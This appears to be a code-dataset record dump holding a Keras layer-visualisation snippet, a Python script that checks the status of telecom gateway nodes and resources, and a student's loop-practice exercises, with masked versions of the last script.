Activation('softmax')\nmodel.add(activ7)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n\nimg = cv2.imread('test.jpg')\nimg = cv2.resize(img, (64, 64))\nimg = np.expand_dims(img, axis=0)\nclasses = model.predict(img)\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n\n _convout1_f = K.function(inputs, [layer.output])\n def convout1_f(X):\n # The [0] is to disable the training phase flag\n return _convout1_f([0] + [X])\n\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n\n print ('Shape of conv:', convolutions.shape)\n\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n\n # Visualization of each filter of the layer\n fig = plt.figure(figsize=(12,8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n,n,i+1)\n ax.imshow(convolutions[i], cmap='gray')\n\n# Specify the layer to want to visualize\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\n\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\n\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/python
import os
from subprocess import Popen, PIPE, STDOUT
import time
import re
import telnetlib
from get_sys_info import get_node_list, get_spec_node_list, get_active_tcu, get_ru_list, is_active_ru
g_rg_list = [
'/SGWNetMgr',
'/SS7SGU',
'/MGW_CMRG',
'/MGW_OMURG',
'/Directory',
]
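# Platform-level RGs that are always checked in addition to the per-node RGs.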
status_dict={
"administrative": "UNLOCKED",
"operational": "ENABLED",
"usage": "ACTIVE",
"procedural": '',
"availability": '',
"unknown": "FALSE",
"alarm": '',
"role": "ACTIVE"
}
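# Expected healthy value for each fshascli status field; an empty string means the field is
# expected to be blank, and 'role' is only used to pick out the active side.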
def get_mo_status(mo_name):
cmd = 'fshascli -s ' + mo_name
output = os.popen(cmd).readlines()
mo_status = {}
for line in output:
if len(line) > 1:
p = re.compile(r'(\S*)\((\S*)\)')
m = p.search(line)
if m:
mo_status[m.group(1)] = m.group(2)
return mo_status
def cmp_mo_status(mo_status):
ret = True
error_info = ''
for k, v in mo_status.items():
if k != 'role' and status_dict[k] != v :
error_info = " " + k + " should be \"" + status_dict[k] + "\" But is \"" + v +"\""
ret = False
return ret, error_info
return ret, error_info
def is_ru_active(mo_status):
return 'role' in mo_status and mo_status['role'] == 'ACTIVE'
def check_mo_status(mo_name, mo_status):
status, error_info = cmp_mo_status(mo_status)
if status:
print("%-40s OK"%(mo_name))
else:
print("%-40s NOK:"%(mo_name))
print(error_info)
return status
def check_mo_list(ru_list):
status = True
for ru in ru_list:
mo_status = get_mo_status(ru)
if is_ru_active(mo_status):
status = check_mo_status(ru, mo_status) and status
return status
def check_rg_status(rg_name):
# print("start to check RG " + rg_name + " ...")
mo_status = get_mo_status(rg_name)
status = check_mo_status(rg_name, mo_status)
if status:
ru_list = get_ru_list(rg_name)
if ru_list:
status = check_mo_list(ru_list) and status
return status
def check_clock():
cmd = 'fsclish -c "show mgw synchronization inputreference"'
ret = os.popen(cmd).read()
print(ret)
r_list = ret.split()
if 'yes' in r_list and 'ok' in r_list:
print("Clock is ok")
return True
else:
print "================================================================="
print "CLOCK IS NOT OK !!!"
print "================================================================="
return False
def is_needed_node_available(node_list):
num_tcu = 0
num_tdm = 0
num_cla = 1
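    # num_cla is hard-coded to 1 because the CLA count below is commented out.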
for node in node_list:
if node.startswith("TCU"):
num_tcu += 1
if node.startswith("TDM"):
num_tdm += 1
# if node.startswith("CLA"):
# num_cla += 1
if num_tcu == 0:
print "No Working DSP available"
if num_tdm == 0:
print "No Working TDM available"
if num_cla == 0:
print "No Working CLA available"
return num_tcu and num_cla and num_tdm
def check_needed_rg(rg_list):
result = True
for rg in rg_list:
result = check_rg_status(rg) and result
return result
def check_node():
result = True
node_list = get_node_list()
if not is_needed_node_available(node_list):
        print "Please first get the node working!"
return
for node in node_list:
if not check_rg_status("/"+node):
result = False
return result
def check_node_list(node_list):
result = True
for node in node_list:
result = check_rg_status("/"+node) and result
return result
def check_all(node_list_all):
ret = True
ret = check_needed_rg(g_rg_list) and ret
ret = check_node_list(node_list_all) and ret
ret = check_clock() and ret
return ret
def check_for_link(node_list_all):
tcu_list = get_spec_node_list(node_list_all, "TCU")
tdm_list = get_spec_node_list(node_list_all, "TDM")
active_tcu_list = get_active_tcu(tcu_list)
ret = True
ret = check_node_list(tdm_list) and ret
ret = check_node_list(active_tcu_list) and ret
ret = check_needed_rg(g_rg_list) and ret
check_clock()
return ret
from optparse import OptionParser
if __name__ == '__main__':
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option("-a", "--all",
action="store_true", dest="check_all_flag",
default=False)
opts, args = parser.parse_args()
node_list = get_node_list()
ret = False
if(opts.check_all_flag):
ret = check_all(node_list)
else:
ret = check_for_link(node_list)
# os.system('tail -f /srv/Log/log/syslog | grep srm')
if ret:
print ("Check ok")
else:
        print("Not all checks passed, please first check the RU and clock status")
|
normal
|
{
"blob_id": "603d904404ace88205a524d8bfbe3e621b65f425",
"index": 8750,
"step-1": "#!/usr/bin/python\nimport os\nfrom subprocess import Popen, PIPE, STDOUT\nimport time\nimport re\nimport telnetlib\nfrom get_sys_info import get_node_list, get_spec_node_list, get_active_tcu, get_ru_list, is_active_ru\ng_rg_list = [\n\t\t\t'/SGWNetMgr',\n\t\t\t'/SS7SGU',\n\t\t\t'/MGW_CMRG',\n\t\t\t'/MGW_OMURG',\n\t\t\t'/Directory',\n]\n\nstatus_dict={\n\t\"administrative\":\t\"UNLOCKED\",\n\t\"operational\":\t\t\"ENABLED\",\n\t\"usage\":\t\t\t\"ACTIVE\",\n\t\"procedural\":\t\t'',\n\t\"availability\":\t\t'',\n\t\"unknown\":\t\t\t\"FALSE\",\n\t\"alarm\":\t\t\t'',\n\t\"role\":\t\t\t\t\"ACTIVE\"\n}\n\ndef get_mo_status(mo_name):\n\tcmd = 'fshascli -s ' + mo_name\n\toutput = os.popen(cmd).readlines()\n\tmo_status = {}\n\tfor line in output:\n\t\tif len(line) > 1:\n\t\t\tp = re.compile(r'(\\S*)\\((\\S*)\\)')\n\t\t\tm = p.search(line)\n\t\t\tif m:\n\t\t\t\tmo_status[m.group(1)] = m.group(2)\n\treturn mo_status\n\n\ndef cmp_mo_status(mo_status):\n\tret = True\n\terror_info = ''\n\tfor k, v in mo_status.items():\n\t\tif k != 'role' and status_dict[k] != v :\n\t\t\terror_info = \" \" + k + \" should be \\\"\" + status_dict[k] + \"\\\" But is \\\"\" + v +\"\\\"\"\n\t\t\tret = False\n\t\t\treturn ret, error_info\n\treturn ret, error_info\n\ndef is_ru_active(mo_status):\n\treturn 'role' in mo_status and mo_status['role'] == 'ACTIVE'\n\n\t\ndef check_mo_status(mo_name, mo_status):\n\tstatus, error_info = cmp_mo_status(mo_status)\n\tif status:\n\t\tprint(\"%-40s OK\"%(mo_name))\n\telse:\n\t\tprint(\"%-40s NOK:\"%(mo_name))\n\t\tprint(error_info)\n\treturn status\n\t\t\n\ndef check_mo_list(ru_list):\n\tstatus = True\n\tfor ru in ru_list:\n\t\tmo_status = get_mo_status(ru)\n\t\tif is_ru_active(mo_status):\n\t\t\tstatus = check_mo_status(ru, mo_status) and status\n\treturn status\n\t\t\n\t\ndef check_rg_status(rg_name):\n#\tprint(\"start to check RG \" + rg_name + \" ...\")\n\tmo_status = get_mo_status(rg_name)\n\tstatus = check_mo_status(rg_name, mo_status)\n\n\tif status:\n\t\tru_list = get_ru_list(rg_name)\n\t\tif ru_list:\n\t\t\tstatus = check_mo_list(ru_list) and status\n\treturn status\n\n\ndef check_clock():\n\tcmd = 'fsclish -c \"show mgw synchronization inputreference\"'\n\tret = os.popen(cmd).read()\n\tprint(ret)\n\tr_list = ret.split()\n\tif 'yes' in r_list and 'ok' in r_list:\n\t\tprint(\"Clock is ok\")\n\t\treturn True\n\telse:\n\t\tprint \"=================================================================\"\n\t\tprint \"CLOCK IS NOT OK !!!\"\n\t\tprint \"=================================================================\"\n\t\treturn False\n\ndef is_needed_node_available(node_list):\n\tnum_tcu = 0\n\tnum_tdm = 0\n\tnum_cla = 1\n\tfor node in node_list:\n\t\tif node.startswith(\"TCU\"):\n\t\t\tnum_tcu += 1\n\t\tif node.startswith(\"TDM\"):\n\t\t\tnum_tdm += 1\n#\t\tif node.startswith(\"CLA\"):\n#\t\t\tnum_cla += 1\n\tif num_tcu == 0:\n\t\tprint \"No Working DSP available\"\n\tif num_tdm == 0:\n\t\tprint \"No Working TDM available\"\n\tif num_cla == 0:\n\t\tprint \"No Working CLA available\"\n\treturn num_tcu and num_cla and num_tdm\n\ndef check_needed_rg(rg_list):\n\tresult = True\n\tfor rg in rg_list:\n\t\tresult = check_rg_status(rg) and result\n\treturn result\n\t\ndef check_node():\n\tresult = True\n\tnode_list = get_node_list()\t\n\tif not is_needed_node_available(node_list):\n\t\tprint \"Please first make the node working!\"\n\t\treturn\n\tfor node in node_list:\n\t\tif not check_rg_status(\"/\"+node):\n\t\t\tresult = False\t\n\treturn result\n\ndef 
check_node_list(node_list):\n\tresult = True\n\tfor node in node_list:\n\t\tresult = check_rg_status(\"/\"+node) and result\n\treturn result\n\n\t\ndef check_all(node_list_all):\n\tret = True\n\tret = check_needed_rg(g_rg_list) and ret \n\tret = check_node_list(node_list_all) and ret\n\tret = check_clock() and ret \n\treturn ret\n\t\ndef check_for_link(node_list_all):\n\ttcu_list = get_spec_node_list(node_list_all, \"TCU\")\n\ttdm_list = get_spec_node_list(node_list_all, \"TDM\")\n\tactive_tcu_list = get_active_tcu(tcu_list)\n\tret = True\n\tret = check_node_list(tdm_list) and ret\n\tret = check_node_list(active_tcu_list) and ret\n\tret = check_needed_rg(g_rg_list) and ret\n\tcheck_clock()\n\treturn ret\n\n\nfrom optparse import OptionParser\n\nif __name__ == '__main__':\n usage = \"usage: %prog [options] arg\"\n parser = OptionParser(usage)\n parser.add_option(\"-a\", \"--all\",\n action=\"store_true\", dest=\"check_all_flag\",\n default=False)\n opts, args = parser.parse_args()\n node_list = get_node_list()\n ret = False\n if(opts.check_all_flag):\n\t ret = check_all(node_list)\n else:\n ret = check_for_link(node_list)\n#\t\tos.system('tail -f /srv/Log/log/syslog | grep srm')\n if ret:\n print (\"Check ok\")\n else:\n\t\tprint(\"Not all check passed, please first check the RU and clock status\")\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Kai Joseph
# Loop Practice
# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.
import sys
import random
''' 1.
Write a for loop that will print out all the integers from 0-4 in ascending order.
'''
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
''' 2.
Write a for loop that will print out all the integers from 0-4 in descending order.
'''
if sys.argv[1] == '2':
for x in range(5):
print(str(4-x))
''' 3.
Write a for loop that will print out all the integers from 5-15 in descending order.
'''
if sys.argv[1] == '3':
for x in range(11):
print(str(15-x))
''' 4.
Write a for loop that will print out all the integers from -5 to 5 in ascending order.
'''
if sys.argv[1] == '4':
for x in range(11):
print(str(-5+x))
''' 5.
Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.
'''
if sys.argv[1] == '5':
for x in range(25,50):
if x%2 != 0:
print(x)
for x in range(26):
if x%2 == 0:
print(str(25+x))
''' 6.
Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100
'''
if sys.argv[1] == '6':
for x in range(1,11):
print(str(x**2))
''' 8.
A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57.
'''
if sys.argv[1] == '8':
for x in range(4,58):
print(x)
days = 57-x
print("Days remaining to reach 57:",str(days))
''' 9.
A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).
'''
if sys.argv[1] == '9':
while True:
students = input("Number of students (excluding the girl): ")
jellybeans = input("Number of jelly beans: ")
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print("Please enter an integer for jelly beans and students.")
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
''' 17.
 Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:
    "1/2 = .5" "1/3 = .333333333333" etc.
'''
if sys.argv[1] == '17':
for x in range(2,21):
num = 1/x
print("1/"+str(x),"=",str(num))
''' 18.
Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).
'''
if sys.argv[1] == '18':
total = 0
for x in range(1,101):
total = total+x
print("Total: "+str(total))
avg = total/x
print("Average: " + str(avg))
''' 19.
A friend tells you that PI can be computed with the following equation:
PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)
Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?
'''
if sys.argv[1] == '19':
it = int(input("Enter the number of iterations: "))
num = 0
for x in range(1,it*2):
if x%2 != 0:
if (x-3)%4 == 0:
num = num - (1/x)
else:
num = num + (1/x)
print(str(4*num))
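	# The series 1 - 1/3 + 1/5 - 1/7 + ... is the Leibniz series for PI/4, so the friend's
	# formula is correct; it just converges very slowly.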
''' 22.
Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print "Coza" in place of the numbers which are multiples of 3, "Loza" for multiples of 5, "Woza" for multiples of 7, "CozaLoza" for multiples of 3 and 5, and so on. Sample output:
1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11
Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22
23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza
......
'''
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1,111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ""
tampered = False
if int(numbers[x][y])%3 == 0:
word = word + "Coza"
tampered = True
if int(numbers[x][y])%5 == 0:
word = word + "Loza"
tampered = True
if int(numbers[x][y])%7 == 0:
word = word + "Woza"
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
''' 23.
Write code that will print out a times-table for practice and reference. It should look like this:
* | 1 2 3 4 5 6 7 8 9
-------------------------------
1 | 1 2 3 4 5 6 7 8 9
2 | 2 4 6 8 10 12 14 16 18
3 | 3 6 9 12 15 18 21 24 27
4 | 4 8 12 16 20 24 28 32 36
5 | 5 10 15 20 25 30 35 40 45
6 | 6 12 18 24 30 36 42 48 54
7 | 7 14 21 28 35 42 49 56 63
8 | 8 16 24 32 40 48 56 64 72
9 | 9 18 27 36 45 54 63 72 81
'''
if sys.argv[1] == '23':
x = [1,2,3,4,5,6,7,8,9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print((int(x[r])*int(y[z])),end=" ")
print("")
''' 25.
Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be "3 2 4 5 1", with a space separating the digits.
'''
if sys.argv[1] == '25':
number = input("Enter the number that you wish to reverse: ")
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number)-1-x])
for x in range(len(n)):
print(n[x],end=" ")
print("")
|
normal
|
{
"blob_id": "eda8bde048f3d4c4af4bd1c296e4cc02b92eaa17",
"index": 4727,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-3": "import sys\nimport random\n<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-4": "# Kai Joseph\n# Loop Practice\n# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.\n\n\nimport sys\nimport random\n\n\n''' 1. \n Write a for loop that will print out all the integers from 0-4 in ascending order. \n'''\n\nif sys.argv[1] == '1':\n\n\tfor x in range(5):\n\n\t\tprint(str(x))\n\n\n''' 2. \n Write a for loop that will print out all the integers from 0-4 in descending order.\n'''\n\nif sys.argv[1] == '2':\n\n\tfor x in range(5):\n\n\t\tprint(str(4-x))\n\n\n\n''' 3. \n Write a for loop that will print out all the integers from 5-15 in descending order.\n'''\n\nif sys.argv[1] == '3':\n\n\tfor x in range(11):\n\n\t\tprint(str(15-x))\n\n\n\n''' 4. \n Write a for loop that will print out all the integers from -5 to 5 in ascending order.\n'''\n\nif sys.argv[1] == '4':\n\n\tfor x in range(11):\n\n\t\tprint(str(-5+x))\n\n\n\n\n''' 5. \n Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.\n'''\n\nif sys.argv[1] == '5':\n\n\tfor x in range(25,50):\n\n\t\tif x%2 != 0:\n\n\t\t\tprint(x)\n\n\tfor x in range(26):\n\n\t\tif x%2 == 0:\n\n\t\t\tprint(str(25+x))\n\n\n\n''' 6. \n Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100\n'''\n\nif sys.argv[1] == '6':\n\n\tfor x in range(1,11):\n\n\t\tprint(str(x**2))\n\n\n\n''' 8. \n A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57. \n'''\n\nif sys.argv[1] == '8':\n\n\tfor x in range(4,58):\n\n\t\tprint(x)\n\n\t\tdays = 57-x\n\n\t\tprint(\"Days remaining to reach 57:\",str(days))\n\n\n\n''' 9. \n A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).\n'''\n\nif sys.argv[1] == '9':\n\n\twhile True:\n\n\t\tstudents = input(\"Number of students (excluding the girl): \")\n\n\t\tjellybeans = input(\"Number of jelly beans: \")\n\n\t\ttry:\n\n\t\t\tstudents = int(students)\n\n\t\t\tjellybeans = int(jellybeans)\n\n\t\t\tbreak\n\n\t\texcept ValueError:\n\n\t\t\tprint(\"Please enter an integer for jelly beans and students.\")\n\n\tdays = 0\n\n\twhile jellybeans > 0:\n\n\t\tjellybeans = jellybeans - students - 2\n\n\t\tdays = days + 1\n\n\n\tprint(days)\n\n\n\n\n\n''' 17. \n Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:\n \"1/2 = .5\" \"1/3 = .666666666667\" etc.\n'''\n\n\nif sys.argv[1] == '17':\n\n\tfor x in range(2,21):\n\n\t\tnum = 1/x\n\n\t\tprint(\"1/\"+str(x),\"=\",str(num))\n\n\n\n\n''' 18. \n Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).\n'''\n\nif sys.argv[1] == '18':\n\n\ttotal = 0\n\n\tfor x in range(1,101):\n\n\t\ttotal = total+x\n\n\tprint(\"Total: \"+str(total))\n\n\tavg = total/x\n\n\tprint(\"Average: \" + str(avg))\n\n\n\n\n''' 19. 
\n A friend tells you that PI can be computed with the following equation:\n PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)\n Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?\n'''\n\nif sys.argv[1] == '19':\n\n\tit = int(input(\"Enter the number of iterations: \"))\n\n\tnum = 0\n\n\tfor x in range(1,it*2):\n\n\t\tif x%2 != 0:\n\n\t\t\tif (x-3)%4 == 0:\n\n\t\t\t\tnum = num - (1/x)\n\n\t\t\telse:\n\n\t\t\t\tnum = num + (1/x)\n\n\n\tprint(str(4*num))\n\n\n\n''' 22. \n Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print \"Coza\" in place of the numbers which are multiples of 3, \"Loza\" for multiples of 5, \"Woza\" for multiples of 7, \"CozaLoza\" for multiples of 3 and 5, and so on. Sample output:\n 1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11 \n Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22 \n 23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza\n ......\n'''\n\nif sys.argv[1] == '22':\n\n\tnumbers = []\n\n\tfor x in range(10):\n\n\t\tnumbers.append([])\n\n\tfor x in range(1,111):\n\n\t\tif x < 12:\n\n\t\t\tnumbers[0].append(x)\n\n\t\telif x < 23:\n\n\t\t\tnumbers[1].append(x)\n\n\t\telif x < 34:\n\n\t\t\tnumbers[2].append(x)\n\n\t\telif x < 45:\n\n\t\t\tnumbers[3].append(x)\n\n\t\telif x < 56:\n\n\t\t\tnumbers[4].append(x)\n\n\t\telif x < 67:\n\n\t\t\tnumbers[5].append(x)\n\n\t\telif x < 78:\n\n\t\t\tnumbers[6].append(x)\n\n\t\telif x < 89:\n\n\t\t\tnumbers[7].append(x)\n\n\t\telif x < 100:\n\n\t\t\tnumbers[8].append(x)\n\n\t\telif x < 111:\n\n\t\t\tnumbers[9].append(x)\n\n\n\tfor x in range(len(numbers)):\n\n\t\tfor y in range(11):\n\n\t\t\tword = \"\"\n\n\t\t\ttampered = False\n\n\t\t\tif int(numbers[x][y])%3 == 0:\n\n\t\t\t\tword = word + \"Coza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%5 == 0:\n\n\t\t\t\tword = word + \"Loza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%7 == 0:\n\n\t\t\t\tword = word + \"Woza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif tampered:\n\n\t\t\t\tnumbers[x][y] = word\n\n\tfor x in range(len(numbers)):\n\n\t\tprint(*numbers[x])\n\n\n\n''' 23.\n Write code that will print out a times-table for practice and reference. It should look like this:\n * | 1 2 3 4 5 6 7 8 9\n -------------------------------\n 1 | 1 2 3 4 5 6 7 8 9\n 2 | 2 4 6 8 10 12 14 16 18\n 3 | 3 6 9 12 15 18 21 24 27\n 4 | 4 8 12 16 20 24 28 32 36\n 5 | 5 10 15 20 25 30 35 40 45\n 6 | 6 12 18 24 30 36 42 48 54\n 7 | 7 14 21 28 35 42 49 56 63\n 8 | 8 16 24 32 40 48 56 64 72\n 9 | 9 18 27 36 45 54 63 72 81\n'''\n\n\nif sys.argv[1] == '23':\n\n\tx = [1,2,3,4,5,6,7,8,9]\n\n\ty = x\n\n\tnumbers = []\n\n\tfor r in range(len(x)):\n\n\t\tfor z in range(len(y)):\n\n\t\t\tprint((int(x[r])*int(y[z])),end=\" \")\n\n\t\tprint(\"\")\n\n\n\n''' 25. \n Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be \"3 2 4 5 1\", with a space separating the digits. \n'''\n\nif sys.argv[1] == '25':\n\n\tnumber = input(\"Enter the number that you wish to reverse: \")\n\n\tnumber = str(number)\n\n\tn = []\n\n\tfor x in range(len(number)):\n\n\t\tn.append(number[len(number)-1-x])\n\n\tfor x in range(len(n)):\n\n\t\tprint(n[x],end=\" 